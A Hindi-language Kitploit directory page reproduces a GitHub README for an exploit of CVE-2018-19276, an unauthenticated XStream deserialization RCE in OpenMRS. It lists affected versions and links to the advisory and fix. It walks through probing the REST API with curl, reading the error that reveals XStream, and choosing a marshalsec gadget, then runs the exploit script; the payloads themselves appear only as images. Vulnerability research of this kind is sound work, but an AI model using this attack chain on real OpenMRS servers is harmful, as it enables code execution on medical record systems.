Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-19276 — CVE-2018-19276 - OpenMRS Insecure Object Deserialization RCE | Kitploit
उपकरण/GitHubGitHub/mpgn/cve-2018-19276
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubmpgn/cve-2018-19276

CVE-2018-19276

CVE-2018-19276 - OpenMRS Insecure Object Deserialization RCE

रिपॉजिटरी देखें
1647 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-19276 OpenMRS असुरक्षित ऑब्जेक्ट डिसीरियलाइज़ेशन RCE

From https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607

असुरक्षित ऑब्जेक्ट डिसीरियलाइज़ेशन बिना लॉग इन किए मनमाना कोड निष्पादन (Arbitrary Code Execution) की अनुमति देता है। वेबसर्विसेज़ मॉड्यूल पर IP प्रतिबंध इस हमले को नहीं रोकते हैं।

image

  • OpenMRS Platform 2.1.x < 2.1.4 के सभी संस्करण
  • OpenMRS Platform 2.0.x < 2.0.8 के सभी संस्करण
  • OpenMRS Platform 1.12.x < 1.12.1 के सभी संस्करण
  • OpenMRS Reference Application 2.8.x < 2.8.1 के सभी संस्करण
  • OpenMRS Reference Application 2.7.x < 2.7.2 के सभी संस्करण
  • OpenMRS Reference Application 2.6.x < 2.6.2 के सभी संस्करण

Bishop Fox में Security Associate Nicolas Serra द्वारा खोजा गया।

प्रमाण अवधारणा

आइए देखें कि आधिकारिक दस्तावेज़ीकरण का उपयोग करके OpenMRS के REST वेबसर्विस कैसे काम करते हैं:

root@kitploit:~
curl -u admin:test -i 'http://localhost:8080/openmrs/ws/rest/v1/concept'

आइए सुधार की जाँच करें:

  • https://github.com/openmrs/openmrs-module-webservices.rest/pull/369
  • https://github.com/openmrs/openmrs-module-webservices.rest/pull/372

हम यह जानकारी पा सकते हैं:

image https://github.com/openmrs/openmrs-module-webservices.rest/pull/369#issuecomment-443513473

वे मूल रूप से POST अनुरोध के Content-type को फ़िल्टर करते हैं जब वह XML होता है, तो संभवतः XXE या एक असुरक्षित डिसीरियलाइज़ेशन 👍

आइए फिर से दस्तावेज़ीकरण की जाँच करें:

image

अच्छा, यह अच्छा है, क्या होता है यदि हम REST वेबसर्विस को XML भेजते हैं?

root@kitploit:~
> curl -i -s -k  -X $'POST' -H $'Host: 127.0.0.1:8888' -H $'Content-Type: text/xml'  $'http://127.0.0.1:8888/openmrs/ws/rest/v1/concept'

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A896A8B1B0092400DBF74E2E8C365949; Path=/openmrs; HttpOnly
Content-Type: application/json;charset=UTF-8
Content-Length: 8980
Date: Mon, 11 Mar 2019 12:58:30 GMT
Connection: close

{"error":{"message":"[ : input contained no data]","code":"com.thoughtworks.xstream.io.xml.XppReader:126","detail":"com.thoughtworks.xstream.io.StreamException:  : input contained no data\n\tat com.thoughtworks.xstream.io.xml.XppReader.pullNextEvent(XppReader.java:126)\n\tat com.thoughtworks.xstream.io.xml.AbstractPullReader.readRealEvent(AbstractPullReader.java:148)\n\tat com.thoughtworks.xstream.io.xml.AbstractPullReader.readEvent(AbstractPullReader.java:141)\n\tat com.thoughtworks.xstream.io.xml.AbstractPullReader.move(AbstractPullReader.java:118)\n\tat com.thoughtworks.xstream.io.xml.AbstractPullReader.moveDown[...]

त्रुटि कुछ बहुत ही रोचक देती है : xstream.XStreamMarshaller

आइए अद्भुत उपकरण marshalsec का उपयोग करके Java डिसीरियलाइज़ेशन का उपयोग करके RCE ट्रिगर करने का प्रयास करें।

उपलब्ध गैजेट की जाँच करें:

root@kitploit:~
$ java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.XStream -v 
No gadget type specified, available are [SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin, CommonsConfiguration, LazySearchEnumeration, BindingEnumeration, ServiceLoader, ImageIO, CommonsBeanutils]

इस बिंदु पर, मैं केवल XStream के प्रत्येक गैजेट पर github खोज का उपयोग करता हूँ ताकि एक घटना ढूँढ सकूँ। केवल गैजेट ImageIO आशाजनक दिखता है:

image

आइए इसे आज़माएँ:

image

बस इतना ही!

एक्सप्लॉइट

root@kitploit:~
python CVE-2018-19276.py

image

संसाधन:

  • https://issues.openmrs.org/browse/RESTWS-742
  • https://www.bishopfox.com/news/2019/02/openmrs-insecure-object-deserialization/
  • https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607
  • https://wiki.openmrs.org/display/docs/REST+Web+Services+API+For+Clients#RESTWebServicesAPIForClients-SampleRESTcalls
टूल डाउनलोड करें